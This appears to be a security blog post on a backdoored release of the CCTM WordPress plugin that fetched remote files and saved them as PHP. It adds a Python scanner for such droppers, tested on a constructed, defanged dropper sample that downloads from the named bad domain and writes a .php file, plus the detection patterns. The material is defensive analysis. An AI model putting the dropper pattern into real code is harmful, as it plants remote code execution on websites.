Update March 7: The WordPress Directory team investigated and mitigated this issue by disconnecting the wooranker account from all plugins, reverting the malicious changes in the CCTM plugin, and changing the version to 0.9.8.9. WordPress should automatically update to this new clean version.
If your site was compromised during the timeframe while the backdoored version (0.9.8.8) was installed, updating to 0.9.8.9 is not enough to clean the site. Please check the Mitigation section at the end of this blogpost.
Last summer we shared a story about the SweetCaptcha WordPress plugin injecting ads and causing malvertising problems for websites that leveraged the plugin. When this plugin was removed from the official WordPress Plugin directory, the authors revived another WordPress account with a long abandoned plugin
It’s a backdoor that can download files from hxxp:/ /wordpresscore .com/plugins /cctm /update/ (the domain name alone is highly suspicious) and save them with the .php extension in the plugin directory.
It looked like a typical backdoor that could be uploaded anywhere on a compromised server, not just in this particular plugin. We decided to check the original plugin package and, to our surprise, found the file in the source! We also discovered that we were not the only ones who had found this file (although people on the forum seemed to believe that the file was merely “vulnerable”). This really was worth investigating.
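As an added defender-side example (not code from the original post or from the plugin), here is a small scanner that walks a plugin directory and flags PHP files showing the two traits described above: a reference to the wordpresscore.com domain, or a remote fetch combined with writing a .php file. The PHP samples at the bottom are constructed and defanged, not real plugin code.

```python
import re
from pathlib import Path

# Indicators taken from the post: the backdoor pulled files from wordpresscore.com
# and dropped them with a .php extension inside the plugin directory.
SUSPICIOUS_DOMAINS = ("wordpresscore.com",)
REMOTE_FETCH = re.compile(r"\b(file_get_contents|curl_init|wp_remote_get|fopen)\s*\(", re.I)
LOCAL_WRITE = re.compile(r"\b(file_put_contents|fwrite|fputs|copy)\s*\(", re.I)
PHP_TARGET = re.compile(r"\.php\s*['\"]", re.I)

def scan_php_source(src: str) -> list[str]:
    """Return the reasons a PHP source text looks like a dropper; empty if none."""
    # Collapse whitespace so spacing such as 'wordpresscore .com' cannot hide the domain.
    compact = re.sub(r"\s+", "", src).lower()
    reasons = []
    for domain in SUSPICIOUS_DOMAINS:
        if domain in compact:
            reasons.append(f"references known bad domain {domain}")
    if REMOTE_FETCH.search(src) and LOCAL_WRITE.search(src) and PHP_TARGET.search(src):
        reasons.append("fetches remote content and writes a .php file")
    return reasons

def scan_plugin_dir(plugin_dir: str) -> dict[str, list[str]]:
    """Walk a plugin directory and map each flagged .php file to its reasons."""
    hits = {}
    for path in sorted(Path(plugin_dir).rglob("*.php")):
        try:
            reasons = scan_php_source(path.read_text(errors="replace"))
        except OSError:
            continue  # unreadable file: skip rather than abort the whole scan
        if reasons:
            hits[str(path)] = reasons
    return hits

# Constructed, defanged samples (not real plugin code) used to exercise the scanner.
CLEAN_SAMPLE = "<?php\n$json = file_get_contents('https://api.example.test/status');\necho $json;\n"
DROPPER_SAMPLE = ("<?php\n$u = 'hxxp://wordpresscore .com/plugins/cctm/update/x';\n"
                  "$body = file_get_contents($u);\n"
                  "file_put_contents(__DIR__ . '/cache.php', $body);\n")

if __name__ == "__main__":
    import sys
    # Usage: python scan.py /path/to/wp-content/plugins/custom-content-type-manager
    for f, why in scan_plugin_dir(sys.argv[1] if len(sys.argv) > 1 else ".").items():
        print(f, "->", "; ".join(why))
```

A hit is a starting point for review, not proof of compromise: legitimate code can fetch and write files, so compare any flagged file against the clean 0.9.8.9 package before deleting it.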